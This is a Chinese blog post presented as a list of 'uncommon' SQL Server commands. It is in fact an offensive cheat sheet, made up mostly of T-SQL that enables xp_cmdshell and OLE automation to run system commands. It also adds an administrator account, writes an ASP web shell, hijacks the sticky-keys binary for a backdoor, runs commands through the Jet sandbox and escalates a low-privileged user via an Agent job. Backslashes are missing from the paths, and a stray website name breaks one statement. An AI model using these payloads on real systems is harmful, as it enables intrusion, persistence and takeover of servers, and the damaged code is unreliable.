SQL 不常用的一些命令sp_OACreate，xp_cmdshell，sp_makewebtask

Posted 2021-01-09 岁月寒风

• 开启和关毕xp_cmdshell
•  
  EXEC sp_configure ‘show advanced options‘, 1;RECONFIGURE;EXEC sp_configure ‘xp_cmdshell‘, 1;RECONFIGURE;-- 开启xp_cmdshell
•  
  EXEC sp_configure ‘show advanced options‘, 1;RECONFIGURE;EXEC sp_configure ‘xp_cmdshell‘, 0;RECONFIGURE;-- 关毕xp_cmdshell
•  
  EXEC sp_configure ‘show advanced options‘, 0; GO RECONFIGURE WITH OVERRIDE; 禁用advanced options
•  
  2.
•  
  xp_cmdshell执行命令
•  
  EXEC master..xp_cmdshell ‘ipconfig‘
•  
  3.
•  
  开启和关毕sp_oacreate
•  
  exec sp_configure ‘show advanced options‘, 1;RECONFIGURE;exec sp_configure ‘Ole Automation Procedures‘,1;RECONFIGURE; 开启
•  
  exec sp_configure ‘show advanced options‘, 1;RECONFIGURE;exec sp_configure ‘Ole Automation Procedures‘,0;RECONFIGURE; 关毕
•  
  EXEC sp_configure ‘show advanced options‘, 0; GO RECONFIGURE WITH OVERRIDE; 禁用advanced options
•  
  4.
•  
  sp_OACreate删除文件
•  
  DECLARE @Result int
•  
  DECLARE @FSO_Token int
•  
  EXEC @Result = sp_OACreate ‘Scripting.FileSystemObject‘, @FSO_Token OUTPUT
•  
  EXEC @Result = sp_OAMethod @FSO_Token, ‘DeleteFile‘, NULL, ‘C:Documents and SettingsAll Users「开始」菜单程序启动user.bat‘
•  
  EXEC @Result = sp_OADestroy @FSO_Token
•  
  5.
•  
  sp_OACreate复制文件
•  
  declare @o int
•  
  exec sp_oacreate ‘scripting.filesystemobject‘, @o out
•  
  exec sp_oamethod @o, ‘copyfile‘,null,‘c:windowsexplorer.exe‘ ,‘c:windowssystem32sethc.exe‘;
•  
  6.
•  
  sp_OACreate移动文件
•  
  declare @aa int
•  
  exec sp_oacreate ‘scripting.filesystemobject‘, @aa out
•  
  exec sp_oamethod @aa, ‘moveFile‘,null,‘c: empipmi.log‘, ‘c: empipmi1.log‘;
•  
  7.
•  
  sp_OACreate加管理员用户
•  
  DECLARE @js int
•  
  EXEC sp_OACreate ‘ScriptControl‘,@js OUT
•  
  EXEC sp_OASetProperty @js, ‘Language‘, ‘javascript‘
•  
  EXEC sp_OAMethod @js, ‘Eval‘, NULL, ‘var o=new ActiveXObject("Shell.Users");z=o.create("user");z.changePassword("pass","");z.setting("AccountType")=3;‘
•  
  8.
•  
  开启和关毕sp_makewebtask
•  
  exec sp_configure ‘show advanced options‘, 1;RECONFIGURE;exec sp_configure ‘Web Assistant Procedures‘,1;RECONFIGURE; 开启
•  
  exec sp_configure ‘show advanced options‘, 1;RECONFIGURE;exec sp_configure ‘Web Assistant Procedures‘,0;RECONFIGURE; 关毕
•  
  EXEC sp_configure ‘show advanced options‘, 0; GO RECONFIGURE WITH OVERRIDE; 禁用advanced options
•  
  9.
•  
  sp_makewebtask新建文件
•  
  exec sp_makewebtask ‘c:windows.txt‘,‘ select ‘‘<%25execute(request("a"))%25>‘‘ ‘;;--
•  
  10.
•  
  wscript.shell执行命令
•  
  use master
•  
  declare @o int
•  
  exec sp_oacreate ‘wscript.shell‘,@o out
•  
  exec sp_oamethod @o,‘run‘,null,‘cmd /c "net user" > c: est.tmp‘
•  
  11.
•  
  Shell.Application执行命令
•  
  declare @o int
•  
  exec sp_oacreate ‘Shell.Application‘, @o out
•  
  exec sp_oamethod @o, ‘ShellExecute‘,null, ‘cmd.exe‘,‘cmd /c net user >c: est.txt‘,‘c:windowssystem32‘,‘‘,‘1‘;
•  
  or
•  
  exec sp_oamethod @o, ‘ShellExecute‘,null, ‘user.vbs‘,‘‘,‘c:‘,‘‘,‘1‘;
•  
  12.
•  
  开启和关毕openrowset
•  
  exec sp_configure ‘show advanced options‘, 1;RECONFIGURE;exec sp_configure ‘Ad Hoc Distributed Queries‘,1;RECONFIGURE; 开启
•  
  exec sp_configure ‘show advanced options‘, 1;RECONFIGURE;exec sp_configure ‘Ad Hoc Distributed Queries‘,0;RECONFIGURE; 关毕
•  
  EXEC sp_configure ‘show advanced options‘, 0; GO RECONFIGURE WITH OVERRIDE; 禁用advanced options
•  
  13.
•  
  沙盒执行命令
•  
  exec master..xp_regwrite ‘HKEY_LOCAL_MACHINE‘,‘SOFTWAREMicrosoftJet4.0Engines‘,‘SandBoxMode‘,‘REG_DWORD‘,1 默认为3
•  
  select * from openrowset(‘microsoft.jet.oledb.4.0‘,‘;database=c:windowssystem32iasias.mdb‘,‘select shell("cmd.exe /c echo a>c:.txt")‘)
•  
  14.
•  
  注册表劫持粘贴键
•  
  exec master..xp_regwrite ‘HKEY_LOCAL_MACHINE‘,‘SOFTWAREMicrosoftWindowsNTCurrentVersionImage File Execution
•  
  Optionssethc.EXE‘,‘Debugger‘,‘REG_SZ‘,‘C:WINDOWSexplorer.exe‘;
•  
  15.
•  
  sp_oacreate替换粘贴键
•  
  declare @o int
•  
  exec sp_oacreate ‘scripting.filesystemobject‘, @o out
•  
  exec sp_oamethod @o, ‘copyfile‘,null,‘c:windowsexplorer.exe‘ ,‘c:windowssystem32sethc.exe‘;
•  
  declare @oo int
•  
  exec sp_oacreate ‘scripting.filesystemobject‘, @oo out exec sp_oamethod @oo, ‘copyfile‘,null,‘c:windowssystem32sethc.exe‘ ,‘c:windowssystem32dllcachesethc.exe‘;
•  
  16.
•  
  public权限提权操作
•  
  USE msdb
•  
  EXEC sp_add_job @job_name = ‘GetSystemOnSQL‘, www.2cto.com
•  
  @enabled = 1,
•  
  @description = ‘This will give a low privileged user access to
•  
  xp_cmdshell‘,
•  
  @delete_level = 1
•  
  EXEC sp_add_jobstep @job_name = ‘GetSystemOnSQL‘,
•  
  @step_name = ‘Exec my sql‘,
•  
  @subsystem = ‘TSQL‘,
•  
  @command = ‘exec master..xp_execresultset N‘‘select ‘‘‘‘exec
•  
  master..xp_cmdshell "dir > c:agent-job-results.txt"‘‘‘‘‘‘,N‘‘Master‘‘‘
•  
  EXEC sp_add_jobserver @job_name = ‘GetSystemOnSQL‘,
•  
  @server_name = ‘SERVER_NAME‘
• 
  EXEC sp_start_job @job_name = ‘GetSystemOnSQL‘
•  

-